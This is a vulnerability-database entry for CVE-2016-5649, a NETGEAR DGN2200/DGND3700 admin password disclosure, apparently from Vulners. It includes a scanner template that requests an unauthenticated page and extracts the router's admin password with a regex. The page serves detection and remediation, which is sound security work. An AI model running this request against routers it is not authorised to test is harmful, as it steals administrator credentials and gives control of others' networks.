Vulners
Lucene search
NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Netgear DGN2200 / DGND3700 / WNDR4500 Information Disclosure Vulnerability | 4 Jan 201700:00 | – | zdt |
| Netgear DGN2200 / DGND3700 - Admin Password Disclosure Vulnerability | 1 May 201900:00 | – | zdt |
 | Netgear DGN2200 Information Disclosure Vulnerability | 26 Jul 201800:00 | – | cnvd |
 | CVE-2016-5649 | 24 Jul 201815:00 | – | cve |
 | CVE-2016-5649 Netgear DGN2200 and DGND3700 disclose the administrator password | 24 Jul 201815:00 | – | cvelist |
 | Netgear DGN2200 / DGND3700 - Admin Password Disclosure | 30 Apr 201900:00 | – | exploitdb |
 | Netgear DGN2200 DGND3700 - Admin Password Disclosure | 30 Apr 201900:00 | – | exploitpack |
 | CVE-2016-5649 | 24 Jul 201815:29 | – | nvd |
 | Netgear DGN2200 / DGND3700 Password Disclosure Vulnerability - Active Check | 6 Jan 201700:00 | – | openvas |
| Netgear DGN2200 / DGND3700 Admin Password Disclosure - Active Check | 25 Jul 201800:00 | – | openvas |
10
id: CVE-2016-5649
info:
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
author: suman_kar
severity: critical
description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
impact: |
An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
remediation: |
Update the router firmware to the latest version, which includes a fix for the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-5649
- https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
- http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-5649
cwe-id: CWE-319,CWE-200
epss-score: 0.27215
epss-percentile: 0.97797
cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: netgear
product: dgn2200_firmware
tags: cve2016,cve,iot,netgear,router,packetstorm,vuln
http:
- raw:
- |
GET /BSW_cxttongr.htm HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Smart Wizard Result</title> "
- type: status
status:
- 200
extractors:
- type: regex
name: password
group: 1
regex:
- '<b>Success "([a-z]+)"'
part: body
# digest: 4a0a00473045022100845e3304d2a852b2dcda318a1842f25924e312fbef772f892b24e5845a3a63940220034696caa6347d1e9926be4bf7aa8a303895e99e42601f5ef9f6c7d4e72c9563:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 39.8
EPSS0.27215